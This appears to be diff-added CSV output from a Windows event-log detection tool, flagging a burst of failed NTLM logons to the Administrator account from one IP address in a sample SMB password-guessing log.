+2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGMJKRYUlmijJV40  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xv33to031A0fQzX2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IT0bzycur7HXFeLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kyY2K7tT0HgQ1ZL3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6aexuFPH6FyEZ1bN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o8Iojas6sznqlYUE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U2SnliYkmx59ACSM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2plWY1GZHilHv5Vh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XIfmqihMJdPVz80p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Odg692Eyde8md0t7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gsQNvf5HkRQnbDul  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: il2DGq3bzfwGuJN4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9OsQFOcIyougrx0E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gR8wpQrGYzd4NrBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KFjRsjWXbEPs9m1I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wbjudOy3rWefzAIv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Q4gc8keCTv2HeE3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SmsaxHrHYuofUhAH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CvhWasTJYmChfsNU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DszGfEo9aua2y5UC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lZPScjxczbrcJuvJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucpjxJV4rBXOxy4e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BmTtDfX05VsKFrON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhWSUkQhv089RSfJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i8RXCiXQYgjuPO78  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pfB3u3Np38FOw6hc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I9GcSmto4jdCIw6H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HsogJdHUcldt7JeH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IUbkohKtCy6joOBY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9ZFyYxBrKnz652Co  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QQ2MHr71xALFHJqN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cgjHOgEYRLQiJX75  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QXLjSNCeDAaX4ttQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: np6hwdqnWLJawVn9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: adqqChrYx3lZ0BAa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1GTXkOnNYTws1MiC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5QUvFvCM6AJhKjXe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NiVgC8oJ5W2Xr3t0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hXfhdrbLnNOGDqy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcjMGbrHQHxIhSSh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LDYPTYHHKAe39GjM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PF3H6LE6MqFjVWx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LLTReOoxRa7UAhT3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jqtqwAPBiBfaHNpv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jmisFXzDpOILUhIX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W5UHqVVAYK08FWit  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PKHLHN59FDnD92Sm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ohAKPRGvg1JCQ91y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pxdcrng84HEG39nJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lFGXFxHPbxDTGmiN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tyFnafBgzoLQWTQR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2IjLjxkd2pX4moFy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9vqYC4KotCYTcQv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qtHcYFIOHglQFb60  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmiHIQrpsAVRJtdb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4TdkChjMAviJ6jr8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sPIGU1rBk0F5cG9P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ScynGWKK3CtoUsi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0E4JAuxC8MuuGfnw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4aDJtqsUWKyuDqBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yCFrEHUgqCtKPybS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ftrEBfaLGbboV8D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: thle3slH6gZYllyQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PcEnabS7oj98WI0e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EBqGp9CD4A9PsyLk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iil8dQlzMCkKRNUb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nDBqxF9bmNNjNdsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QJNBRV3BRVEN8hmG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OGl1Tbdw7PDvVsRR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uspHTc4JwnjjZQti  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Exq3nfy1LeFOPcA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vdFC4g7vsLO0zOzL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
